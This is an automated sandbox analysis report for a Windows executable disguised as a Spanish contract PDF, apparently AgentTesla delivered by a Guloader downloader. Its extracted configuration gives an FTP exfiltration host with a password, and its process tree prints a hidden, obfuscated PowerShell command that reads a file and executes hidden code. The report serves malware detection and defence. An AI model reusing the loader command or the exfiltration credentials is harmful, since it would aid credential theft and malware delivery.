Analysis
-
max time kernel
0s -
max time network
147s -
platform
windows7_x64 -
resource
win7-20231130-en -
resource tags
arch:x64arch:x86image:win7-20231130-enlocale:en-usos:windows7-x64system -
submitted
07-12-2023 16:45
Static task
static1
Behavioral task
behavioral1
Sample
ANÁLISIS DEL CONTRATO-pdf.exe
Resource
win7-20231130-en
Behavioral task
behavioral2
Sample
ANÁLISIS DEL CONTRATO-pdf.exe
Resource
win10v2004-20231127-en
General
-
Target
ANÁLISIS DEL CONTRATO-pdf.exe
-
Size
703KB
-
MD5
1a19d3b35592f19f97ad7c43b0a875e6
-
SHA1
38fd4bb32e9b5a0d58413954bed06aadb3e714ba
-
SHA256
35e6acc4ddeace130bae6e47e1e1062862fd7f6b4fecf8136dd3e109c5011aa4
-
SHA512
8f9de97ca969b26809fc47101091c20895bcc35793a331d22cc7fa32929fcc2229eb7b99b44d3a070431adc0795d5c81175e8fb98688a73382d72d4ad3ebf0f4
-
SSDEEP
12288:ywFGHEJsv/EqlEyhS6fOaoceSZylgimtdYM3O0V7bbb:y5HEJsHEqlHSkElgZtub0V7j
Malware Config
Extracted
agenttesla
Protocol: ftp- Host:
ftp://ftp.vvspijkenisse.nl - Port:
21 - Username:
[email protected] - Password:
playingboyz231
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Drops file in System32 directory 1 IoCs
Processes:
ANÁLISIS DEL CONTRATO-pdf.exedescription ioc process File opened for modification C:\Windows\SysWOW64\Haglskadeforsikring\Miljankenvnet.ini ANÁLISIS DEL CONTRATO-pdf.exe -
Drops file in Program Files directory 4 IoCs
Processes:
ANÁLISIS DEL CONTRATO-pdf.exedescription ioc process File opened for modification C:\Program Files (x86)\Common Files\integraltegnets\substrate.Ski ANÁLISIS DEL CONTRATO-pdf.exe File created C:\Program Files (x86)\cockling.lnk ANÁLISIS DEL CONTRATO-pdf.exe File opened for modification C:\Program Files (x86)\cockling.lnk ANÁLISIS DEL CONTRATO-pdf.exe File opened for modification C:\Program Files (x86)\Kldebonnets.kod ANÁLISIS DEL CONTRATO-pdf.exe -
Drops file in Windows directory 3 IoCs
Processes:
ANÁLISIS DEL CONTRATO-pdf.exedescription ioc process File opened for modification C:\Windows\Calottes.Doo ANÁLISIS DEL CONTRATO-pdf.exe File opened for modification C:\Windows\bagvognen.lnk ANÁLISIS DEL CONTRATO-pdf.exe File created C:\Windows\bagvognen.lnk ANÁLISIS DEL CONTRATO-pdf.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
ANÁLISIS DEL CONTRATO-pdf.exedescription pid process target process PID 3040 wrote to memory of 1660 3040 ANÁLISIS DEL CONTRATO-pdf.exe powershell.exe PID 3040 wrote to memory of 1660 3040 ANÁLISIS DEL CONTRATO-pdf.exe powershell.exe PID 3040 wrote to memory of 1660 3040 ANÁLISIS DEL CONTRATO-pdf.exe powershell.exe PID 3040 wrote to memory of 1660 3040 ANÁLISIS DEL CONTRATO-pdf.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\ANÁLISIS DEL CONTRATO-pdf.exe"C:\Users\Admin\AppData\Local\Temp\ANÁLISIS DEL CONTRATO-pdf.exe"1⤵
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:3040 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Raastegendes=Get-Content 'C:\Users\Admin\AppData\Roaming\gregerss\dagbger\Nondesulfurization\Tetrodotoxin\Uglegylpet225\Rejsebureau\Forsyningsskib.Evi';$Impoundage=$Raastegendes.SubString(56924,3);.$Impoundage($Raastegendes)"2⤵PID:1660
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"3⤵PID:2064
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
32B
MD5a8ca1db6ae34f5e5c152094f44f92476
SHA19fe0fd4e6907c4f9099d2533c3bade4ffa0968e7
SHA2561f0dbc97d6570f2f5a1e18f82842c9a0007e568ca8fb768c123637ef5077aad3
SHA512e48e987e1f8297b17f7fb5b8b34da6131156834310987600b20b0dcff4c43632ccb4b2305030a4a999f783176d480c8300e6aef92afbb2032379eca6dac88b5a
-
C:\Users\Admin\AppData\Roaming\gregerss\dagbger\Nondesulfurization\Tetrodotoxin\Uglegylpet225\Rejsebureau\Forsyningsskib.Evi
Filesize55KB
MD5b2c54dadf0aec1e7b39900949f8d1679
SHA12e4c3297515729015c62453cc6fb44f629e89f4e
SHA256b7460b0941c2246ab083dc1d337ba1f1dcc78c0372b7cc1c7e1378b56895846e
SHA5127b9fb5354681317348e8c38c2698b6fd10cdba6d0022c2c6e5036094c4a18c2daf2ce5d596256a97114003b1cdc10ae0cf944846fb25ed5e3117f16c9a864f74
-
C:\Users\Admin\AppData\Roaming\gregerss\dagbger\Nondesulfurization\Tetrodotoxin\Uglegylpet225\Rejsebureau\Senaternes.Roy
Filesize295KB
MD50a7d7f667c023342453da0b0e1acfa13
SHA1d0afd80a5fba0e1ef7388144ff2962fd171f79d1
SHA256667135c582b072003c3f6781280df0a00da6830e3efcb7a5e8e53f8f32cf650e
SHA512702661ed98f65d13afc5a6184881561deb3eea979a5a1bbcf1f22eab537e723a3a644eb7878b15ad71a062faa2d521fd706e2bf37ca9345a501c9b39004721d2